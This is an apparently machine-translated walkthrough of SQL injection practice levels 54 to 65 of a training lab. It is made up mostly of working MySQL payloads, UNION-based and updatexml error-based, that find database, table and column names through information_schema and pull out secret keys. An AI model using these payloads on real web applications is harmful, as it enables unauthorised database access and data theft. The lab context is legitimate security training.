sql-lab (54-65)

(54~60)

sql-lab-54

from 54 Turn off and start , The level began to be difficult

54 Off only allows us to enter statements ten times , After ten sentences, the range will check all the database names , Table name , Refresh the column name . So start from this level , All statements are for reference only .

First step , First judge the closing mode ：

id=1 'and 1=2 --q

Page error reporting , So the closing method is Single quotation marks

The second step , Judge whether keywords are disabled

The third step Determine the construction idea of the injection statement

• Should echo for this page, so use joint query

  ?id=-1’ union select 1,2,database() – q

The discovery library is named ：challenges

?id=-1 ’ union select 1,table_name,3 from information_schema.tables where table_schema=‘challenges’ limit 0,1-- q

Found table name is ：ufka71dqts

?id=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘ufka71dqts’-- q

Found column name is ：:id,sessid,secret_JZU6,tryy

?id=-1 ’ union select 1,secret_JZU6,3 from ufka71dqts – q

The query is successful , Submit our query results to ：Submit Secret Key

This problem has been successfully solved ！

sql-lab-55

Judge the closure ,?id=1)and 1=1-- q

It is found that the closing mode is Brackets

Determine the construction idea of the injection statement

• Should echo for this page, so use joint query

  ?id=-1)union select 1,2,database() – q

The discovery library is named ：challenges

?id=-1 )union select 1,table_name,3 from information_schema.tables where table_schema=‘challenges’ limit 0,1-- q

Found table name is ：qbj8tdrlxb

?id=-1)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘qbj8tdrlxb’-- q

Found column name is ：id,sessid,secret_N7EM,tryy

?id=-1 )union select 1,secret_N7EM,3 from qbj8tdrlxb – q

The query is successful , Submit our query results to ：Submit Secret Key

This problem has been successfully solved ！

sql-lab-56

Judge the closure ,?id=1’)and 1=1-- q

Determine the construction idea of the injection statement

• Should echo for this page, so use joint query

  ?id=-1’) union select 1,2,database() – q

The discovery library is named ：challenges

?id=-1 )union select 1,table_name,3 from information_schema.tables where table_schema=‘challenges’ limit 0,1-- q

Found table name is ：okzcd5g9co

?id=-1’)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘okzcd5g9co’-- q

Found column name is ：:id,sessid,secret_W8S8,tryy

?id=-1’)union select 1,secret_W8S8,3 from okzcd5g9co – q

The query is successful , Submit our query results to ：Submit Secret Key

This problem has been successfully solved ！

sql-lab-57

This question is the same as the previous question except for the closing method

Judge the closure ,?id=1"and 1=1-- q

sql-lab-58

First, judge whether it is closed ,?id=1’ and 1=1 – q

Then use the joint query to find that it cannot be used , Then we use error injection .

?id=1’ and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

The discovery library is named ：challenges

?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q

Found table name is ：20lvmztx1r

?id=1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘20lvmztx1r’ limit 0,1),0x7e),1)-- q

Found column name is ：id,sessid,secret_X8WY,tryy

id=1’ and updatexml(1,concat(0x7e,(select secret_X8WY from 20lvmztx1r limit 0,1),0x7e),1)-- q

The query is successful ,

This problem has been successfully solved ！

sql-lab-59

?id=1 and 1=2-- q

?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

?id=1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘fjwx950mdd’ limit 0,1),0x7e),1)-- q

id=1 and updatexml(1,concat(0x7e,(select secret_Z2BD from fjwx950mdd limit 0,1),0x7e),1)-- q

sql-lab-60

?id=1")and 1=2-- q

?id=1") and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

?id=1") and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q

?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘hmguhc8wji’ limit 0,1),0x7e),1)-- q

id=1") and updatexml(1,concat(0x7e,(select secret_0LPA from hmguhc8wji limit 0,1),0x7e),1)-- q

(61~65)

spl-lab-61

?id=1’))and 1=1-- q

?id=1’)) and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

?id=1’)) and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q

?id=1’)) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘qd5l9mppz3’ limit 0,1),0x7e),1)-- q

?id=1’)) and updatexml(1,concat(0x7e,(select secret_ZHCO from qd5l9mppz3 limit 0,1),0x7e),1)-- q

sql-lab-62~65

In this problem, we find that joint query and error reporting injection can't use anything

First judge the closing mode ：

?id=1’)and 1=1-- q

Then use blind injection

It is suggested to write a blind note script .

Since then sql-lab It's over